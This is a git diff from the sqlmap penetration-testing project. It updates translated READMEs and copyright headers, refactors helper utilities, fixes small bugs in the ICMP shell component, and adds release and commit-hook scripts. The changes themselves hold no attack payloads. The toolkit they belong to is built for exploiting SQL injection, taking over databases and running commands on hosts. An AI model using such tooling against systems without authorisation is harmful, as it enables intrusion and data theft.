[こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。 + +[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 + +使用法 +---- + +基本的なオプションとスイッチの使用法をリストするには: + + python sqlmap.py -h + +全てのオプションとスイッチの使用法をリストするには: + + python sqlmap.py -hh + +実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。 +sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 + +リンク +---- + +* ホームページ: http://sqlmap.org +* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 課題管理: https://github.com/sqlmapproject/sqlmap/issues +* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki +* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md index 63a0bafc8..ce5e42621 100644 --- a/doc/translations/README-pt-BR.md +++ b/doc/translations/README-pt-BR.md @@ -1,5 +1,6 @@ -sqlmap -== +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. @@ -18,7 +19,7 @@ Você pode baixar o arquivo tar mais recente clicando [aqui] De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas. @@ -33,7 +34,7 @@ Para obter a lista completa de opções faça: python sqlmap.py -hh -Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217). +Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601). Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). Links @@ -45,9 +46,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md new file mode 100644 index 000000000..f44bd97fb --- /dev/null +++ b/doc/translations/README-tr-TR.md @@ -0,0 +1,53 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır. + + +Ekran görüntüleri +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. + + +Kurulum +---- + +[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz. + +Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir. + +Kullanım +---- + + +Bütün basit seçeneklerin listesini gösterir + + python sqlmap.py -h + +Bütün seçenekleri gösterir + + python sqlmap.py -hh + +Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz + +Links +---- + +* Anasayfa: http://sqlmap.org +* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues +* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki +* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md index c3b8b2941..b94454da2 100644 --- a/doc/translations/README-zh-CN.md +++ b/doc/translations/README-zh-CN.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 @@ -18,7 +18,7 @@ sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测, 推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上 @@ -33,7 +33,7 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 python sqlmap.py -hh -你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 +你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 链接 ---- @@ -44,9 +44,6 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index cd8ef9be5..2f1d10c80 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index a94f6756f..b93583711 100755 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,17 +24,19 @@ def hideAscii(data): return retVal -def cloak(inputFile): - f = open(inputFile, 'rb') - data = zlib.compress(f.read()) - f.close() +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() - return hideAscii(data) + return hideAscii(zlib.compress(data)) -def decloak(inputFile): - f = open(inputFile, 'rb') +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() try: - data = zlib.decompress(hideAscii(f.read())) + data = zlib.decompress(hideAscii(data)) except: print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile sys.exit(1) diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 4d3dc8c5e..fe5c1cd23 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c index 5c127d843..af30618f9 100644 --- a/extra/icmpsh/icmpsh-s.c +++ b/extra/icmpsh/icmpsh-s.c @@ -99,7 +99,7 @@ void usage(char *path) printf(" -h this screen\n"); printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); + printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE); printf("In order to improve the speed, lower the delay (-d) between requests or\n"); printf("increase the size (-s) of the data buffer\n"); } @@ -203,8 +203,6 @@ int main(int argc, char **argv) PROCESS_INFORMATION pi; int status; unsigned int max_data_size; - struct hostent *he; - // set defaults target = 0; diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982..6e96952b3 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -76,7 +76,7 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: + while True: cmd = '' # Wait for incoming replies diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py index 67d7ee6aa..368558bf4 100644 --- a/extra/mssqlsig/update.py +++ b/extra/mssqlsig/update.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -43,7 +43,7 @@ def updateMSSQLXML(): return - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) + releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) releasesCount = len(releases) # Create the minidom document @@ -74,7 +74,7 @@ def updateMSSQLXML(): stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) + servicepackVersion = re.findall("(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt index 717800aa4..4d4caa8f8 100644 --- a/extra/runcmd/README.txt +++ b/extra/runcmd/README.txt @@ -1,3 +1,3 @@ -Files in this folder can be used to compile auxiliary program that can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. +runcmd.exe is an auxiliary program that can be used for running command prompt +commands skipping standard "cmd /c" way. It is licensed under the terms of the +GNU Lesser General Public License. diff --git a/shell/runcmd.exe_ b/extra/runcmd/runcmd.exe_ similarity index 100% rename from shell/runcmd.exe_ rename to extra/runcmd/runcmd.exe_ diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/src/README.txt similarity index 100% rename from extra/runcmd/windows/README.txt rename to extra/runcmd/src/README.txt diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/src/runcmd.sln similarity index 100% rename from extra/runcmd/windows/runcmd.sln rename to extra/runcmd/src/runcmd.sln diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/src/runcmd/runcmd.cpp similarity index 100% rename from extra/runcmd/windows/runcmd/runcmd.cpp rename to extra/runcmd/src/runcmd/runcmd.cpp diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/src/runcmd/runcmd.vcproj similarity index 100% rename from extra/runcmd/windows/runcmd/runcmd.vcproj rename to extra/runcmd/src/runcmd/runcmd.vcproj diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/src/runcmd/stdafx.cpp similarity index 100% rename from extra/runcmd/windows/runcmd/stdafx.cpp rename to extra/runcmd/src/runcmd/stdafx.cpp diff --git a/extra/runcmd/windows/runcmd/stdafx.h b/extra/runcmd/src/runcmd/stdafx.h similarity index 100% rename from extra/runcmd/windows/runcmd/stdafx.h rename to extra/runcmd/src/runcmd/stdafx.h diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/safe2bin/__init__.py +++ b/extra/safe2bin/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py index c91620ec6..fe16fbce9 100644 --- a/extra/safe2bin/safe2bin.py +++ b/extra/safe2bin/safe2bin.py @@ -3,7 +3,7 @@ """ safe2bin.py - Simple safe(hex) to binary format converter -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,14 +19,17 @@ from optparse import OptionParser # Regex used for recognition of hex encoded characters HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" -# Regex used for recognition of representation for hex encoded invalid unicode characters -INVALID_UNICODE_CHAR_REGEX = r"(?P\\\?[0-9A-Fa-f]{2})" - # Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" # Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) +SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) + +# Prefix used for hex encoded values +HEX_ENCODED_PREFIX = r"\x" + +# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) +HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" # String used for temporary marking of slash characters SLASH_MARKER = "__SLASH__" @@ -44,7 +47,8 @@ def safecharencode(value): retVal = value if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): + if any([_ not in SAFE_CHARS for _ in value]): + retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) retVal = retVal.replace('\\', SLASH_MARKER) for char in SAFE_ENCODE_SLASH_REPLACEMENTS: @@ -53,6 +57,7 @@ def safecharencode(value): retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) retVal = retVal.replace(SLASH_MARKER, "\\\\") + retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) elif isinstance(value, list): for i in xrange(len(value)): retVal[i] = safecharencode(value[i]) @@ -83,12 +88,6 @@ def safechardecode(value, binary=False): if binary: if isinstance(retVal, unicode): retVal = retVal.encode("utf8") - while True: - match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) - else: - break elif isinstance(value, (list, tuple)): for i in xrange(len(value)): diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index 4d699f123..c4204cce6 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index eac95ccf8..ac5219a5d 100644 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission # Removes duplicate entries in wordlist like files diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh new file mode 100644 index 000000000..77ed2824c --- /dev/null +++ b/extra/shutils/postcommit-hook.sh @@ -0,0 +1,23 @@ +#!/bin/bash + +SETTINGS="../../lib/core/settings.py" + +declare -x SCRIPTPATH="${0}" + +FULLPATH=${SCRIPTPATH%/*}/$SETTINGS + +if [ -f $FULLPATH ] +then + LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE") + if [ -n "$NEW_TAG" ] + then + #git commit -am "Automatic monthly tagging" + echo "Creating new tag ${NEW_TAG}" + git tag $NEW_TAG + git push origin $NEW_TAG + echo "Going to push PyPI package" + /bin/bash ${SCRIPTPATH%/*}/pypi.sh + fi +fi diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh new file mode 100644 index 000000000..3c2137ce2 --- /dev/null +++ b/extra/shutils/precommit-hook.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +PROJECT="../../" +SETTINGS="../../lib/core/settings.py" +CHECKSUM="../../txt/checksum.md5" + +declare -x SCRIPTPATH="${0}" + +PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT +SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM + +git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 + +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi + +truncate -s 0 "$CHECKSUM_FULLPATH" +cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh new file mode 100644 index 000000000..e4f901c74 --- /dev/null +++ b/extra/shutils/pydiatra.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) +# See the file 'doc/COPYING' for copying permission + +# Runs py2diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh old mode 100644 new mode 100755 diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py index 440f638a6..f0b684322 100644 --- a/extra/shutils/pylint.py +++ b/extra/shutils/pylint.py @@ -20,8 +20,8 @@ def check(module): print "CHECKING ", module pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') for line in pout: - if re.match("E....:.", line): - print line + if re.match("\AE:", line): + print line.strip() if __RATING__ and "Your code has been rated at" in line: print line score = re.findall("\d.\d\d", line)[0] diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh new file mode 100644 index 000000000..02dba1cfd --- /dev/null +++ b/extra/shutils/pypi.sh @@ -0,0 +1,171 @@ +#!/bin/bash + +declare -x SCRIPTPATH="${0}" +SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py" +VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3) +TYPE=pip +TMP_DIR=/tmp/pypi +mkdir $TMP_DIR +cd $TMP_DIR +cat > $TMP_DIR/setup.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from setuptools import setup, find_packages + +setup( + name='sqlmap', + version='$VERSION', + description="Automatic SQL injection and database takeover tool", + author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', + author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', + url='https://sqlmap.org', + download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', + license='GNU General Public License v2 (GPLv2)', + packages=find_packages(), + include_package_data=True, + zip_safe=False, + # https://pypi.python.org/pypi?%3Aaction=list_classifiers + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'Natural Language :: English', + 'Operating System :: OS Independent', + 'Programming Language :: Python', + 'Environment :: Console', + 'Topic :: Database', + 'Topic :: Security', + ], + entry_points={ + 'console_scripts': [ + 'sqlmap = sqlmap.sqlmap:main', + ], + }, +) +EOF +wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip +unzip sqlmap.zip +rm sqlmap.zip +mv "sqlmap-$VERSION" sqlmap +cat > sqlmap/__init__.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import sys + +sys.dont_write_bytecode = True +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +EOF +cat > README.rst << "EOF" +sqlmap +====== + +|Build Status| |Python 2.6|2.7| |License| |Twitter| + +sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over +of database servers. It comes with a powerful detection engine, many +niche features for the ultimate penetration tester and a broad range of +switches lasting from database fingerprinting, over data fetching from +the database, to accessing the underlying file system and executing +commands on the operating system via out-of-band connections. + +Screenshots +----------- + +.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png + :alt: Screenshot + + +You can visit the `collection of +screenshots `__ +demonstrating some of features on the wiki. + +Installation +------------ + +You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: :: + + pip install --upgrade sqlmap + +Alternatively, you can download the latest tarball by clicking +`here `__ or +latest zipball by clicking +`here `__. + +If you prefer fetching daily updates, you can download sqlmap by cloning the +`Git `__ repository: + +:: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with +`Python `__ version **2.6.x** and +**2.7.x** on any platform. + +Usage +----- + +To get a list of basic options and switches use: + +:: + + python sqlmap.py -h + +To get a list of all options and switches use: + +:: + + python sqlmap.py -hh + +You can find a sample run `here `__. To +get an overview of sqlmap capabilities, list of supported features and +description of all options and switches, along with examples, you are +advised to consult the `user's +manual `__. + +Links +----- + +- Homepage: http://sqlmap.org +- Download: + `.tar.gz `__ + or `.zip `__ +- Commits RSS feed: + https://github.com/sqlmapproject/sqlmap/commits/master.atom +- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +- User's manual: https://github.com/sqlmapproject/sqlmap/wiki +- Frequently Asked Questions (FAQ): + https://github.com/sqlmapproject/sqlmap/wiki/FAQ +- Twitter: 